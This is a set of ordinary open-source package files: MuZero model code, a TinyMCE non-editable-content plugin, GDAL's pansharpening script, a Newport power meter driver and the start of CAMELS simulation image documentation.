self.prediction_head = nn.Sequential(
nn.Linear(self.proj_out, self.pred_hid),
nn.BatchNorm1d(self.pred_hid),
activation,
nn.Linear(self.pred_hid, self.pred_out),
)
def initial_inference(self, obs: torch.Tensor) -> MZNetworkOutput:
"""
Overview:
Initial inference of MuZero model, which is the first step of the MuZero model.
To perform the initial inference, we first use the representation network to obtain the ``latent_state``.
Then we use the prediction network to predict ``value`` and ``policy_logits`` of the ``latent_state``.
Arguments:
- obs (:obj:`torch.Tensor`): The 2D image observation data.
Returns (MZNetworkOutput):
- value (:obj:`torch.Tensor`): The output value of input state to help policy improvement and evaluation.
- reward (:obj:`torch.Tensor`): The predicted reward of input state and selected action. \
In initial inference, we set it to zero vector.
- policy_logits (:obj:`torch.Tensor`): The output logit to select discrete action.
- latent_state (:obj:`torch.Tensor`): The encoding latent state of input state.
Shapes:
- obs (:obj:`torch.Tensor`): :math:`(B, num_channel, obs_shape[1], obs_shape[2])`, where B is batch_size.
- value (:obj:`torch.Tensor`): :math:`(B, value_support_size)`, where B is batch_size.
- reward (:obj:`torch.Tensor`): :math:`(B, reward_support_size)`, where B is batch_size.
- policy_logits (:obj:`torch.Tensor`): :math:`(B, action_dim)`, where B is batch_size.
- latent_state (:obj:`torch.Tensor`): :math:`(B, H_, W_)`, where B is batch_size, H_ is the height of \
latent state, W_ is the width of latent state.
"""
batch_size = obs.size(0)
latent_state = self._representation(obs)
policy_logits, value = self._prediction(latent_state)
return MZNetworkOutput(
value,
[0. for _ in range(batch_size)],
policy_logits,
latent_state,
)
def recurrent_inference(self, latent_state: torch.Tensor, action: torch.Tensor) -> MZNetworkOutput:
"""
Overview:
Recurrent inference of MuZero model, which is the rollout step of the MuZero model.
To perform the recurrent inference, we first use the dynamics network to predict ``next_latent_state``,
``reward``, by the given current ``latent_state`` and ``action``.
We then use the prediction network to predict the ``value`` and ``policy_logits`` of the current
``latent_state``.
Arguments:
- latent_state (:obj:`torch.Tensor`): The encoding latent state of input state.
- action (:obj:`torch.Tensor`): The predicted action to rollout.
Returns (MZNetworkOutput):
- value (:obj:`torch.Tensor`): The output value of input state to help policy improvement and evaluation.
- reward (:obj:`torch.Tensor`): The predicted reward of input state and selected action.
- policy_logits (:obj:`torch.Tensor`): The output logit to select discrete action.
- latent_state (:obj:`torch.Tensor`): The encoding latent state of input state.
- next_latent_state (:obj:`torch.Tensor`): The predicted next latent state.
Shapes:
- obs (:obj:`torch.Tensor`): :math:`(B, num_channel, obs_shape[1], obs_shape[2])`, where B is batch_size.
- action (:obj:`torch.Tensor`): :math:`(B, )`, where B is batch_size.
- value (:obj:`torch.Tensor`): :math:`(B, value_support_size)`, where B is batch_size.
- reward (:obj:`torch.Tensor`): :math:`(B, reward_support_size)`, where B is batch_size.
- policy_logits (:obj:`torch.Tensor`): :math:`(B, action_dim)`, where B is batch_size.
- latent_state (:obj:`torch.Tensor`): :math:`(B, H_, W_)`, where B is batch_size, H_ is the height of \
latent state, W_ is the width of latent state.
- next_latent_state (:obj:`torch.Tensor`): :math:`(B, H_, W_)`, where B is batch_size, H_ is the height of \
latent state, W_ is the width of latent state.
"""
next_latent_state, reward = self._dynamics(latent_state, action)
policy_logits, value = self._prediction(next_latent_state)
return MZNetworkOutput(value, reward, policy_logits, next_latent_state)
def _representation(self, observation: torch.Tensor) -> torch.Tensor:
"""
Overview:
Use the representation network to encode the observations into latent state.
Arguments:
- obs (:obj:`torch.Tensor`): The 2D image observation data.
Returns:
- latent_state (:obj:`torch.Tensor`): The encoding latent state of input state.
Shapes:
- obs (:obj:`torch.Tensor`): :math:`(B, num_channel, obs_shape[1], obs_shape[2])`, where B is batch_size.
- latent_state (:obj:`torch.Tensor`): :math:`(B, H_, W_)`, where B is batch_size, H_ is the height of \
latent state, W_ is the width of latent state.
"""
latent_state = self.representation_network(observation)
if self.state_norm:
latent_state = renormalize(latent_state)
return latent_state
def _prediction(self, latent_state: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
"""
Overview:
Use the prediction network to predict ``policy_logits`` and ``value``.
Arguments:
- latent_state (:obj:`torch.Tensor`): The encoding latent state of input state.
Returns:
- policy_logits (:obj:`torch.Tensor`): The output logit to select discrete action.
- value (:obj:`torch.Tensor`): The output value of input state to help policy improvement and evaluation.
Shapes:
- latent_state (:obj:`torch.Tensor`): :math:`(B, H_, W_)`, where B is batch_size, H_ is the height of \
latent state, W_ is the width of latent state.
- policy_logits (:obj:`torch.Tensor`): :math:`(B, action_dim)`, where B is batch_size.
- value (:obj:`torch.Tensor`): :math:`(B, value_support_size)`, where B is batch_size.
"""
return self.prediction_network(latent_state)
def _dynamics(self, latent_state: torch.Tensor, action: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
"""
Overview:
Concatenate ``latent_state`` and ``action`` and use the dynamics network to predict ``next_latent_state``
and ``reward``.
Arguments:
- latent_state (:obj:`torch.Tensor`): The encoding latent state of input state.
- action (:obj:`torch.Tensor`): The predicted action to rollout.
Returns:
- next_latent_state (:obj:`torch.Tensor`): The predicted latent state of the next timestep.
- reward (:obj:`torch.Tensor`): The predicted reward of the current latent state and selected action.
Shapes:
- latent_state (:obj:`torch.Tensor`): :math:`(B, H_, W_)`, where B is batch_size, H_ is the height of \
latent state, W_ is the width of latent state.
- action (:obj:`torch.Tensor`): :math:`(B, )`, where B is batch_size.
- next_latent_state (:obj:`torch.Tensor`): :math:`(B, H_, W_)`, where B is batch_size, H_ is the height of \
latent state, W_ is the width of latent state.
- reward (:obj:`torch.Tensor`): :math:`(B, reward_support_size)`, where B is batch_size.
"""
# NOTE: the discrete action encoding type is important for some environments
# discrete action space
# the final action_encoding shape is (batch_size, 1, latent_state[2], latent_state[3]), e.g. (8, 1, 4, 1).
action_encoding = (
torch.ones((
latent_state.shape[0],
1,
latent_state.shape[2],
latent_state.shape[3],
)).to(action.device).float()
)
if len(action.shape) == 2:
# (batch_size, action_dim) -> (batch_size, action_dim, 1)
# e.g., torch.Size([8, 1]) -> torch.Size([8, 1, 1])
action = action.unsqueeze(-1)
elif len(action.shape) == 1:
# (batch_size,) -> (batch_size, action_dim=1, 1)
# e.g., -> torch.Size([8, 1]) -> torch.Size([8, 1, 1])
action = action.unsqueeze(-1).unsqueeze(-1)
# action[:, 0, None, None] shape: (batch_size, action_dim, 1, 1) e.g. (8, 1, 1, 1)
# the final action_encoding shape: (batch_size, 1, latent_state[2], latent_state[3]) e.g. (8, 1, 4, 1),
# where each element is normalized as action[i]/action_space_size
action_encoding = (action[:, 0, None, None] * action_encoding / self.action_space_size)
# state_action_encoding shape: (batch_size, latent_state[1] + 1, latent_state[2], latent_state[3])
state_action_encoding = torch.cat((latent_state, action_encoding), dim=1)
next_latent_state, reward = self.dynamics_network(state_action_encoding)
if self.state_norm:
next_latent_state = renormalize(next_latent_state)
return next_latent_state, reward
def project(self, latent_state: torch.Tensor, with_grad: bool = True) -> torch.Tensor:
"""
Overview:
Project the latent state to a lower dimension to calculate the self-supervised loss, which is involved in
MuZero algorithm in EfficientZero.
For more details, please refer to paper ``Exploring Simple Siamese Representation Learning``.
Arguments:
- latent_state (:obj:`torch.Tensor`): The encoding latent state of input state.
- with_grad (:obj:`bool`): Whether to calculate gradient for the projection result.
Returns:
- proj (:obj:`torch.Tensor`): The result embedding vector of projection operation.
Shapes:
- latent_state (:obj:`torch.Tensor`): :math:`(B, H_, W_)`, where B is batch_size, H_ is the height of \
latent state, W_ is the width of latent state.
- proj (:obj:`torch.Tensor`): :math:`(B, projection_output_dim)`, where B is batch_size.
Examples:
>>> latent_state = torch.randn(256, 64, 6, 6)
>>> output = self.project(latent_state)
>>> output.shape # (256, 1024)
.. note::
for Atari:
observation_shape = (12, 96, 96), # original shape is (3,96,96), frame_stack_num=4
if downsample is True, latent_state.shape: (batch_size, num_channel, obs_shape[1] / 16, obs_shape[2] / 16)
i.e., (256, 64, 96 / 16, 96 / 16) = (256, 64, 6, 6)
latent_state reshape: (256, 64, 6, 6) -> (256,64*6*6) = (256, 2304)
# self.projection_input_dim = 64*6*6 = 2304
# self.projection_output_dim = 1024
"""
latent_state = latent_state.reshape(latent_state.shape[0], -1)
proj = self.projection(latent_state)
if with_grad:
# with grad, use prediction_head
return self.prediction_head(proj)
else:
return proj.detach()
def get_params_mean(self) -> float:
return get_params_mean(self)
class DynamicsNetwork(nn.Module):
def __init__(
self,
num_res_blocks: int,
num_channels: int,
reward_head_channels: int,
fc_reward_layers: SequenceType,
output_support_size: int,
flatten_output_size_for_reward_head: int,
last_linear_layer_init_zero: bool = True,
activation: Optional[nn.Module] = nn.ReLU(inplace=True),
):
"""
Overview:
The definition of dynamics network in MuZero algorithm, which is used to predict next latent state and
reward given current latent state and action.
Arguments:
- num_res_blocks (:obj:`int`): The number of res blocks in AlphaZero model.
- num_channels (:obj:`int`): The channels of input, including obs and action encoding.
- reward_head_channels (:obj:`int`): The channels of reward head.
- fc_reward_layers (:obj:`SequenceType`): The number of hidden layers of the reward head (MLP head).
- output_support_size (:obj:`int`): The size of categorical reward output.
- flatten_output_size_for_reward_head (:obj:`int`): The flatten size of output for reward head, i.e., \
the input size of reward head.
- last_linear_layer_init_zero (:obj:`bool`): Whether to use zero initialization for the last layer of \
reward mlp, default set it to True.
- activation (:obj:`Optional[nn.Module]`): Activation function used in network, which often use in-place \
operation to speedup, e.g. ReLU(inplace=True).
"""
super().__init__()
self.num_channels = num_channels
self.flatten_output_size_for_reward_head = flatten_output_size_for_reward_head
self.conv = nn.Conv2d(num_channels, num_channels - 1, kernel_size=3, stride=1, padding=1, bias=False)
self.bn = nn.BatchNorm2d(num_channels - 1)
self.resblocks = nn.ModuleList(
[
ResBlock(
in_channels=num_channels - 1, activation=activation, norm_type='BN', res_type='basic', bias=False
) for _ in range(num_res_blocks)
]
)
self.conv1x1_reward = nn.Conv2d(num_channels - 1, reward_head_channels, 1)
self.bn_reward = nn.BatchNorm2d(reward_head_channels)
self.fc_reward_head = MLP(
self.flatten_output_size_for_reward_head,
hidden_channels=fc_reward_layers[0],
layer_num=len(fc_reward_layers) + 1,
out_channels=output_support_size,
activation=activation,
norm_type='BN',
output_activation=nn.Identity(),
output_norm_type=None,
last_linear_layer_init_zero=last_linear_layer_init_zero
)
self.activation = activation
def forward(self, state_action_encoding: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
"""
Overview:
Forward computation of the dynamics network. Predict next latent state given current latent state and action.
Arguments:
- state_action_encoding (:obj:`torch.Tensor`): The state-action encoding, which is the concatenation of \
latent state and action encoding, with shape (batch_size, num_channels, height, width).
Returns:
- next_latent_state (:obj:`torch.Tensor`): The next latent state, with shape (batch_size, num_channels, \
height, width).
- reward (:obj:`torch.Tensor`): The predicted reward, with shape (batch_size, output_support_size).
"""
# take the state encoding (latent_state), state_action_encoding[:, -1, :, :] is action encoding
latent_state = state_action_encoding[:, :-1, :, :]
x = self.conv(state_action_encoding)
x = self.bn(x)
# the residual link: add state encoding to the state_action encoding
x += latent_state
x = self.activation(x)
for block in self.resblocks:
x = block(x)
next_latent_state = x
x = self.conv1x1_reward(next_latent_state)
x = self.bn_reward(x)
x = self.activation(x)
x = x.view(-1, self.flatten_output_size_for_reward_head)
# use the fully connected layer to predict reward
reward = self.fc_reward_head(x)
return next_latent_state, reward
def get_dynamic_mean(self) -> float:
return get_dynamic_mean(self)
def get_reward_mean(self) -> float:
return get_reward_mean(self) | PypiClean |
/GeoNode-3.2.0-py3-none-any.whl/geonode/static/lib/js/plugins/noneditable/plugin.js | (function () {
'use strict';
var global = tinymce.util.Tools.resolve('tinymce.PluginManager');
var global$1 = tinymce.util.Tools.resolve('tinymce.util.Tools');
var getNonEditableClass = function (editor) {
return editor.getParam('noneditable_noneditable_class', 'mceNonEditable');
};
var getEditableClass = function (editor) {
return editor.getParam('noneditable_editable_class', 'mceEditable');
};
var getNonEditableRegExps = function (editor) {
var nonEditableRegExps = editor.getParam('noneditable_regexp', []);
if (nonEditableRegExps && nonEditableRegExps.constructor === RegExp) {
return [nonEditableRegExps];
} else {
return nonEditableRegExps;
}
};
var hasClass = function (checkClassName) {
return function (node) {
return (' ' + node.attr('class') + ' ').indexOf(checkClassName) !== -1;
};
};
var replaceMatchWithSpan = function (editor, content, cls) {
return function (match) {
var args = arguments, index = args[args.length - 2];
var prevChar = index > 0 ? content.charAt(index - 1) : '';
if (prevChar === '"') {
return match;
}
if (prevChar === '>') {
var findStartTagIndex = content.lastIndexOf('<', index);
if (findStartTagIndex !== -1) {
var tagHtml = content.substring(findStartTagIndex, index);
if (tagHtml.indexOf('contenteditable="false"') !== -1) {
return match;
}
}
}
return '<span class="' + cls + '" data-mce-content="' + editor.dom.encode(args[0]) + '">' + editor.dom.encode(typeof args[1] === 'string' ? args[1] : args[0]) + '</span>';
};
};
var convertRegExpsToNonEditable = function (editor, nonEditableRegExps, e) {
var i = nonEditableRegExps.length, content = e.content;
if (e.format === 'raw') {
return;
}
while (i--) {
content = content.replace(nonEditableRegExps[i], replaceMatchWithSpan(editor, content, getNonEditableClass(editor)));
}
e.content = content;
};
var setup = function (editor) {
var editClass, nonEditClass;
var contentEditableAttrName = 'contenteditable';
editClass = ' ' + global$1.trim(getEditableClass(editor)) + ' ';
nonEditClass = ' ' + global$1.trim(getNonEditableClass(editor)) + ' ';
var hasEditClass = hasClass(editClass);
var hasNonEditClass = hasClass(nonEditClass);
var nonEditableRegExps = getNonEditableRegExps(editor);
editor.on('PreInit', function () {
if (nonEditableRegExps.length > 0) {
editor.on('BeforeSetContent', function (e) {
convertRegExpsToNonEditable(editor, nonEditableRegExps, e);
});
}
editor.parser.addAttributeFilter('class', function (nodes) {
var i = nodes.length, node;
while (i--) {
node = nodes[i];
if (hasEditClass(node)) {
node.attr(contentEditableAttrName, 'true');
} else if (hasNonEditClass(node)) {
node.attr(contentEditableAttrName, 'false');
}
}
});
editor.serializer.addAttributeFilter(contentEditableAttrName, function (nodes) {
var i = nodes.length, node;
while (i--) {
node = nodes[i];
if (!hasEditClass(node) && !hasNonEditClass(node)) {
continue;
}
if (nonEditableRegExps.length > 0 && node.attr('data-mce-content')) {
node.name = '#text';
node.type = 3;
node.raw = true;
node.value = node.attr('data-mce-content');
} else {
node.attr(contentEditableAttrName, null);
}
}
});
});
};
function Plugin () {
global.add('noneditable', function (editor) {
setup(editor);
});
}
Plugin();
}()); | PypiClean |
/MFD%20Floods-0.1.14.tar.gz/MFD Floods-0.1.14/bin/gdal_pansharpen.py |
import os
import os.path
import sys
from osgeo import gdal
def DoesDriverHandleExtension(drv, ext):
exts = drv.GetMetadataItem(gdal.DMD_EXTENSIONS)
return exts is not None and exts.lower().find(ext.lower()) >= 0
def GetExtension(filename):
ext = os.path.splitext(filename)[1]
if ext.startswith('.'):
ext = ext[1:]
return ext
def GetOutputDriversFor(filename):
drv_list = []
ext = GetExtension(filename)
for i in range(gdal.GetDriverCount()):
drv = gdal.GetDriver(i)
if (drv.GetMetadataItem(gdal.DCAP_CREATE) is not None or
drv.GetMetadataItem(gdal.DCAP_CREATECOPY) is not None) and \
drv.GetMetadataItem(gdal.DCAP_RASTER) is not None:
if ext and DoesDriverHandleExtension(drv, ext):
drv_list.append(drv.ShortName)
else:
prefix = drv.GetMetadataItem(gdal.DMD_CONNECTION_PREFIX)
if prefix is not None and filename.lower().startswith(prefix.lower()):
drv_list.append(drv.ShortName)
# GMT is registered before netCDF for opening reasons, but we want
# netCDF to be used by default for output.
if ext.lower() == 'nc' and not drv_list and \
drv_list[0].upper() == 'GMT' and drv_list[1].upper() == 'NETCDF':
drv_list = ['NETCDF', 'GMT']
return drv_list
def GetOutputDriverFor(filename):
drv_list = GetOutputDriversFor(filename)
ext = GetExtension(filename)
if not drv_list:
if not ext:
return 'GTiff'
else:
raise Exception("Cannot guess driver for %s" % filename)
elif len(drv_list) > 1:
print("Several drivers matching %s extension. Using %s" % (ext if ext else '', drv_list[0]))
return drv_list[0]
def Usage():
print('Usage: gdal_pansharpen [--help-general] pan_dataset {spectral_dataset[,band=num]}+ out_dataset')
print(' [-of format] [-b band]* [-w weight]*')
print(' [-r {nearest,bilinear,cubic,cubicspline,lanczos,average}]')
print(' [-threads {ALL_CPUS|number}] [-bitdepth val] [-nodata val]')
print(' [-spat_adjust {union,intersection,none,nonewithoutwarning}]')
print(' [-verbose_vrt] [-co NAME=VALUE]* [-q]')
print('')
print('Create a dataset resulting from a pansharpening operation.')
return -1
def gdal_pansharpen(argv):
argv = gdal.GeneralCmdLineProcessor(argv)
if argv is None:
return -1
pan_name = None
last_name = None
spectral_ds = []
spectral_bands = []
out_name = None
bands = []
weights = []
frmt = None
creation_options = []
callback = gdal.TermProgress_nocb
resampling = None
spat_adjust = None
verbose_vrt = False
num_threads = None
bitdepth = None
nodata = None
i = 1
argc = len(argv)
while i < argc:
if (argv[i] == '-of' or argv[i] == '-f') and i < len(argv) - 1:
frmt = argv[i + 1]
i = i + 1
elif argv[i] == '-r' and i < len(argv) - 1:
resampling = argv[i + 1]
i = i + 1
elif argv[i] == '-spat_adjust' and i < len(argv) - 1:
spat_adjust = argv[i + 1]
i = i + 1
elif argv[i] == '-b' and i < len(argv) - 1:
bands.append(int(argv[i + 1]))
i = i + 1
elif argv[i] == '-w' and i < len(argv) - 1:
weights.append(float(argv[i + 1]))
i = i + 1
elif argv[i] == '-co' and i < len(argv) - 1:
creation_options.append(argv[i + 1])
i = i + 1
elif argv[i] == '-threads' and i < len(argv) - 1:
num_threads = argv[i + 1]
i = i + 1
elif argv[i] == '-bitdepth' and i < len(argv) - 1:
bitdepth = argv[i + 1]
i = i + 1
elif argv[i] == '-nodata' and i < len(argv) - 1:
nodata = argv[i + 1]
i = i + 1
elif argv[i] == '-q':
callback = None
elif argv[i] == '-verbose_vrt':
verbose_vrt = True
elif argv[i][0] == '-':
sys.stderr.write('Unrecognized option : %s\n' % argv[i])
return Usage()
elif pan_name is None:
pan_name = argv[i]
pan_ds = gdal.Open(pan_name)
if pan_ds is None:
return 1
else:
if last_name is not None:
pos = last_name.find(',band=')
if pos > 0:
spectral_name = last_name[0:pos]
ds = gdal.Open(spectral_name)
if ds is None:
return 1
band_num = int(last_name[pos + len(',band='):])
band = ds.GetRasterBand(band_num)
spectral_ds.append(ds)
spectral_bands.append(band)
else:
spectral_name = last_name
ds = gdal.Open(spectral_name)
if ds is None:
return 1
for j in range(ds.RasterCount):
spectral_ds.append(ds)
spectral_bands.append(ds.GetRasterBand(j + 1))
last_name = argv[i]
i = i + 1
if pan_name is None or not spectral_bands:
return Usage()
out_name = last_name
if frmt is None:
frmt = GetOutputDriverFor(out_name)
if not bands:
bands = [j + 1 for j in range(len(spectral_bands))]
else:
for band in bands:
if band < 0 or band > len(spectral_bands):
print('Invalid band number in -b: %d' % band)
return 1
if weights and len(weights) != len(spectral_bands):
print('There must be as many -w values specified as input spectral bands')
return 1
vrt_xml = """<VRTDataset subClass="VRTPansharpenedDataset">\n"""
if bands != [j + 1 for j in range(len(spectral_bands))]:
for i, band in enumerate(bands):
sband = spectral_bands[band - 1]
datatype = gdal.GetDataTypeName(sband.DataType)
colorname = gdal.GetColorInterpretationName(sband.GetColorInterpretation())
vrt_xml += """ <VRTRasterBand dataType="%s" band="%d" subClass="VRTPansharpenedRasterBand">
<ColorInterp>%s</ColorInterp>
</VRTRasterBand>\n""" % (datatype, i + 1, colorname)
vrt_xml += """ <PansharpeningOptions>\n"""
if weights:
vrt_xml += """ <AlgorithmOptions>\n"""
vrt_xml += """ <Weights>"""
for i, weight in enumerate(weights):
if i > 0:
vrt_xml += ","
vrt_xml += "%.16g" % weight
vrt_xml += "</Weights>\n"
vrt_xml += """ </AlgorithmOptions>\n"""
if resampling is not None:
vrt_xml += ' <Resampling>%s</Resampling>\n' % resampling
if num_threads is not None:
vrt_xml += ' <NumThreads>%s</NumThreads>\n' % num_threads
if bitdepth is not None:
vrt_xml += ' <BitDepth>%s</BitDepth>\n' % bitdepth
if nodata is not None:
vrt_xml += ' <NoData>%s</NoData>\n' % nodata
if spat_adjust is not None:
vrt_xml += ' <SpatialExtentAdjustment>%s</SpatialExtentAdjustment>\n' % spat_adjust
pan_relative = '0'
if frmt.upper() == 'VRT':
if not os.path.isabs(pan_name):
pan_relative = '1'
pan_name = os.path.relpath(pan_name, os.path.dirname(out_name))
vrt_xml += """ <PanchroBand>
<SourceFilename relativeToVRT="%s">%s</SourceFilename>
<SourceBand>1</SourceBand>
</PanchroBand>\n""" % (pan_relative, pan_name)
for i, sband in enumerate(spectral_bands):
dstband = ''
for j, band in enumerate(bands):
if i + 1 == band:
dstband = ' dstBand="%d"' % (j + 1)
break
ms_relative = '0'
ms_name = spectral_ds[i].GetDescription()
if frmt.upper() == 'VRT':
if not os.path.isabs(ms_name):
ms_relative = '1'
ms_name = os.path.relpath(ms_name, os.path.dirname(out_name))
vrt_xml += """ <SpectralBand%s>
<SourceFilename relativeToVRT="%s">%s</SourceFilename>
<SourceBand>%d</SourceBand>
</SpectralBand>\n""" % (dstband, ms_relative, ms_name, sband.GetBand())
vrt_xml += """ </PansharpeningOptions>\n"""
vrt_xml += """</VRTDataset>\n"""
if frmt.upper() == 'VRT':
f = gdal.VSIFOpenL(out_name, 'wb')
if f is None:
print('Cannot create %s' % out_name)
return 1
gdal.VSIFWriteL(vrt_xml, 1, len(vrt_xml), f)
gdal.VSIFCloseL(f)
if verbose_vrt:
vrt_ds = gdal.Open(out_name, gdal.GA_Update)
vrt_ds.SetMetadata(vrt_ds.GetMetadata())
else:
vrt_ds = gdal.Open(out_name)
if vrt_ds is None:
return 1
return 0
vrt_ds = gdal.Open(vrt_xml)
out_ds = gdal.GetDriverByName(frmt).CreateCopy(out_name, vrt_ds, 0, creation_options, callback=callback)
if out_ds is None:
return 1
return 0
def main():
return gdal_pansharpen(sys.argv)
if __name__ == '__main__':
sys.exit(gdal_pansharpen(sys.argv)) | PypiClean |
/Instrumental-lib-0.7.zip/Instrumental-lib-0.7/instrumental/drivers/powermeters/newport.py | import time
from . import PowerMeter
from .. import Facet, MessageFacet, VisaMixin, deprecated
from ..util import visa_timeout_context
from ... import Q_, u
def _check_visa_support(visa_inst):
with visa_timeout_context(visa_inst, 100):
try:
if int(visa_inst.query('Z?')) in (0, 1):
return 'Newport_1830_C'
except:
pass
return None
def MyFacet(msg, readonly=False, **kwds):
"""Like SCPI_Facet, but without a space before the set-value"""
get_msg = msg + '?'
set_msg = None if readonly else (msg + '{}')
return MessageFacet(get_msg, set_msg, convert=int, **kwds)
class Newport_1830_C(PowerMeter, VisaMixin):
"""A Newport 1830-C power meter"""
_INST_PRIORITY_ = 8 # IDN isn't supported
_INST_PARAMS_ = ['visa_address']
# Status byte codes
_PARAM_ERROR = 1
_COMMAND_ERROR = 2
_SATURATED = 4
_OUT_OF_RANGE = 8
_MSG_AVAILABLE = 16
_BUSY = 32
_SERVICE_REQUEST = 64
_READY_READING = 128
# Filter averaging constants
SLOW_FILTER = 1
MEDIUM_FILTER = 2
NO_FILTER = 3
def _initialize(self):
self._rsrc.read_termination = '\n'
self._rsrc.write_termination = '\n'
def close(self):
self.local_lockout = False
status_byte = MyFacet('Q', readonly=True)
@deprecated('status_byte')
def get_status_byte(self):
"""Query the status byte register and return it as an int"""
return self.status_byte
@Facet(units='W', cached=False)
def power(self):
"""Get the current power measurement
Returns
-------
power : Quantity
Power in units of watts, regardless of the power meter's current
'units' setting.
"""
original_units = self.query('U?')
if original_units != '1':
self.write('U1') # Measure in watts
power = float(self.query('D?'))
self.write('U' + original_units)
else:
power = float(self.query('D?'))
return Q_(power, 'watts')
@deprecated('power')
def get_power(self):
return self.power
range = MyFacet('R', doc="The current input range, [1-8], where 1 is lowest signal.")
def enable_auto_range(self):
"""Enable auto-range"""
self.set_range(0)
def disable_auto_range(self):
"""Disable auto-range
Leaves the signal range at its current position.
"""
cur_range = self.get_range()
self.set_range(cur_range)
@deprecated('range')
def set_range(self, range_num):
"""Set the range for power measurements
range_num = 0 for auto-range
range_num = 1 to 8 for manual signal range
(1 is lowest, and 8 is highest)
Parameters
----------
n : int
Sets the signal range for the input signal.
"""
self.range = range_num
@deprecated('range')
def get_range(self):
"""Return the current range setting as an int
1 corresponds to the lowest range, while 8 is the highest range (least
amplifier gain).
Note that this does not query the status of auto-range.
Returns
-------
range : int
the current range setting. Possible values are from 1-8.
"""
return self.range
wavelength = MyFacet('W', units='nm')
@deprecated('wavelength')
def set_wavelength(self, wavelength):
"""Set the input signal wavelength setting
Parameters
----------
wavelength : Quantity
wavelength of the input signal, in units of [length]
"""
self.wavelength = wavelength
@deprecated('wavelength')
def get_wavelength(self):
"""Get the input wavelength setting"""
return self.wavelength
attenuator = MyFacet('A', value={False:0, True:1}, doc="Whether the attenuator is enabled")
@deprecated('attenuator')
def enable_attenuator(self, enabled=True):
"""Enable the power meter attenuator"""
self.write('A{}', int(enabled))
@deprecated('attenuator')
def disable_attenuator(self):
"""Disable the power meter attenuator"""
self.enable_attenuator(False)
@deprecated('attenuator')
def attenuator_enabled(self):
"""Whether the attenuator is enabled
Returns
-------
enabled : bool
whether the attenuator is enabled
"""
val = self.write('A?')
return bool(val)
def get_valid_power(self, max_attempts=10, polling_interval=0.1*u.s):
"""Returns a valid power reading
This convience function will try to measure a valid power up to a
maximum of `max_attempts` times, pausing for time
`polling_interval` between each attempt.
If a power reading is taken when the power meter is over-range,
saturated, or busy, the reading will be invalid.
In practice, this function also seems to mitigate
the fact that about 1 in 500 power readings mysteriously fails.
Parameters
----------
max_attempts : integer
maximum number of attempts to measure a valid power
polling_interval : Quantity
time to wait between measurement attemps, in units of time
Returns
-------
power : Quantity
Power in units of watts, regardless of the power meter's current
'units' setting.
"""
self.enable_auto_range()
i_attempts = 0
is_valid = False
while not is_valid:
self.disable_hold()
time.sleep(polling_interval.to('s').m)
self.enable_hold()
i_attempts += 1
try:
is_valid = self.is_measurement_valid()
if is_valid:
power = self.power
self.disable_hold()
return power
except:
is_valid = False
if i_attempts > max_attempts:
self.disable_hold()
err_string = "No valid power readings were taken over the maximum allowed number of attempts `max_attempts`."
err_string += " The power meter is likely saturated."
raise Exception(err_string)
def set_slow_filter(self):
"""Set the averaging filter to slow mode
The slow filter uses a 16-measurement running average.
"""
self.write('F1')
def set_medium_filter(self):
"""Set the averaging filter to medium mode
The medium filter uses a 4-measurement running average.
"""
self.write('F2')
def set_no_filter(self):
"""Set the averaging filter to fast mode, i.e. no averaging"""
self.write('F3')
def get_filter(self):
"""Get the current setting for the averaging filter
Returns
-------
SLOW_FILTER, MEDIUM_FILTER, NO_FILTER
the current averaging filter
"""
val = self.query("F?")
return int(val)
def enable_hold(self, enable=True):
"""Enable hold mode"""
self.write('G{}', int(not enable))
def disable_hold(self):
"""Disable hold mode"""
self.enable_hold(False)
def hold_enabled(self):
"""Whether hold mode is enabled
Returns
-------
enabled : bool
True if in hold mode, False if in run mode
"""
val = int(self.query('G?'))
return (val == 0)
def is_measurement_valid(self):
"""Whether the current measurement is valid
The measurement is considered invalid if the power meter is saturated,
over-range or busy.
"""
reg = self.get_status_byte()
is_saturated = bool(reg & self._SATURATED)
is_over_range = bool(reg & self._OUT_OF_RANGE)
is_busy = bool(reg & self._BUSY)
return not (is_saturated or is_over_range or is_busy)
def store_reference(self):
"""Store the current power input as a reference
Sets the current power measurement as the reference power for future dB
or relative measurements.
"""
self.write('S')
def enable_zero(self, enable=True):
"""Enable the zero function
When enabled, the next power reading is stored as a background value
and is subtracted off of all subsequent power readings.
"""
self.write("Z{}", int(enable))
def disable_zero(self):
"""Disable the zero function"""
self.enable_zero(False)
def zero_enabled(self):
"""Whether the zero function is enabled"""
val = int(self.query('Z?')) # Need to cast to int first
return bool(val)
def set_units(self, units):
"""Set the units for displaying power measurements
The different unit modes are watts, dB, dBm, and REL. Each displays
the power in a different way.
'watts' displays absolute power in watts
'dBm' displays power in dBm (i.e. dBm = 10 * log(P / 1mW))
'dB' displays power in dB relative to the current reference power (i.e.
dB = 10 * log(P / Pref). At power-up, the reference power is set to
1mW.
'REL' displays power relative to the current reference power (i.e.
REL = P / Pref)
The current reference power can be set using `store_reference()`.
Parameters
----------
units : 'watts', 'dBm', 'dB', or 'REL'
Case-insensitive str indicating which units mode to enter.
"""
units = units.lower()
valid_units = {'watts': 1, 'dbm': 2, 'db': 3, 'rel': 4}
if units not in valid_units:
raise Exception("`units` must be one of 'watts', 'dbm', 'db', or 'rel")
self.write('U{}', valid_units[units])
def get_units(self):
"""Get the units used for displaying power measurements
Returns
-------
units : str
'watts', 'db', 'dbm', or 'rel'
"""
val = int(self.query('U?'))
units = {1: 'watts', 2: 'db', 3: 'dbm', 4: 'rel'}
return units[val]
@property
def local_lockout(self):
"""Whether local-lockout is enabled"""
return bool(self.query('L?'))
@local_lockout.setter
def local_lockout(self, enable):
self.write("L{}", int(enable)) | PypiClean |
/CAMELS_library-0.3.tar.gz/CAMELS_library-0.3/docs/source/images.rst | ******
Images
******
There are two different ways to create images from the simulations:
Column density
--------------
The first option is to create images by computing the column density along the center of each pixel. The next script computes the column density of the gas temperature as
.. math::
\bar{T}(x,y) = \frac{\int m(x,y,z)T(x,y,z) dz}{\int m(x,y,z)dz}
where :math:`m(x,y,z)` and :math:`T(x,y,z)` are the gas mass and temperature at position :math:`(x,y,z)`.
.. code-block:: python
import numpy as np
import MAS_library as MASL
import camels_library as CL
import h5py
##################################### INPUT ######################################
# input and output files
snapshot = '/mnt/ceph/users/camels/Sims/IllustrisTNG/LH_0/snap_033.hdf5'
f_out = 'gas_temperature.npy'
# region over which make the image (should be squared)
x_min, x_max = 0.0, 25.0 #Mpc/h
y_min, y_max = 0.0, 25.0 #Mpc/h
z_min, z_max = 0.0, 5.0 #Mpc/h
